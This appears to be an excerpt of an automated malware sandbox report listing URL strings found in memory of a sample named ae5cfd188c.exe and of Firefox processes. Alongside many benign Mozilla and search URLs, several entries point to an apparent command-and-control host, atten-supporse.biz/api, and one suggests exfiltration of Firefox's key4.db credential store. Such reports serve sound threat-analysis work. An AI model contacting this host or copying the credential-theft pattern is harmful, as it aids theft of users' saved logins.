Source: firefox.exe, 00000018.00000003.2659017231.000002BA5991F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/_acquireAutoScrollWakeLock
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000018.00000002.2793027167.000002BA4B4BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.g
Source: firefox.exe, 00000018.00000002.2870614524.000002BA61967000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2787277792.000000D7F87D8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B75A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B580000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B852000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2753582951.000000000543C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2750675747.000000000543C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: ae5cfd188c.exe, 00000007.00000003.2602849220.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/%
Source: ae5cfd188c.exe, 00000007.00000003.2572489789.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2675012706.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2576960562.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2621695300.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2572381559.0000000000C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz//
Source: ae5cfd188c.exe, 00000007.00000003.2675964314.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2716989299.000000000543C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/=
Source: ae5cfd188c.exe, 00000007.00000003.2675964314.0000000000C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/M
Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2813369882.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api
Source: ae5cfd188c.exe, 00000007.00000003.2621573612.0000000000C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api%
Source: ae5cfd188c.exe, 0000000A.00000003.2657437696.0000000000CAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiW6Wl
Source: ae5cfd188c.exe, 0000000A.00000003.2656059323.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiW6WlN&
Source: ae5cfd188c.exe, 0000000A.00000003.2684316064.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2717480504.0000000000CAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiW6Wlv
Source: ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752988072.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2675780705.0000000000C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiZ
Source: ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apia
Source: ae5cfd188c.exe, 00000007.00000003.2572489789.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2572381559.0000000000C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apie
Source: ae5cfd188c.exe, 00000007.00000003.2675710575.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752988072.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2621573612.0000000000C76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apille
Source: ae5cfd188c.exe, 00000007.00000003.2675710575.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2602875312.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752988072.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2621573612.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2602900867.0000000000C75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apindows
Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/~i
Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api
Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api$
Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api.default-release/key4.dbPK
Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiW6Wl
Source: firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000018.00000003.2736929005.000002BA61CE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61990000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://baidu.com
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000018.00000002.2842971512.000002BA5BA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813831095.000002BA597AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2842971512.000002BA5BA95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000018.00000003.2766500542.000002BA5B07F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813831095.000002BA597C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61C14000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000018.00000002.2792299128.000002BA49C11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
